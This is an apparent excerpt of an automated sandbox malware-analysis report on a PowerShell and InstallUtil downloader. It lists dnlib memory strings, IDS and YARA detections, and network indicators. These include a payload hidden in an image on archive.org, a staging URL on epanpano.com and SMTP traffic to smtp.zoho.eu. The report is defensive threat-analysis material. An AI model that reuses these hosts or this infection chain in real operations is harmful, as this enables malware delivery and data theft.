Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 78.142.208.13:443 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.86:443 -> 192.168.2.4:49730

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.230.212.164:587

Source: global traffic	HTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /log/ORGN.txt HTTP/1.1Host: epanpano.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 207.241.227.86 207.241.227.86
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
Source: Joe Sandbox View	ASN Name: VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.230.212.164:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /log/ORGN.txt HTTP/1.1Host: epanpano.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ia601606.us.archive.org
Source: global traffic	DNS traffic detected: DNS query: epanpano.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: smtp.zoho.eu

Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: powershell.exe, 00000003.00000002.1751049132.000001CB85A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://epanpano.com
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ia601606.us.archive.org
Source: InstallUtil.exe, 00000006.00000002.2946845698.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: powershell.exe, 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1811360347.00000235000BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB85531000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.zoho.eu
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://status.thawte.com0:
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000001.00000002.1811360347.0000023500044000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.1811360347.000002350008A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB85531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1751049132.000001CB85901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://epanpano.com
Source: powershell.exe, 00000003.00000002.1751049132.000001CB85901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://epanpano.com/log/ORGN.txt
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1751049132.000001CB864C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86B63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.arXB
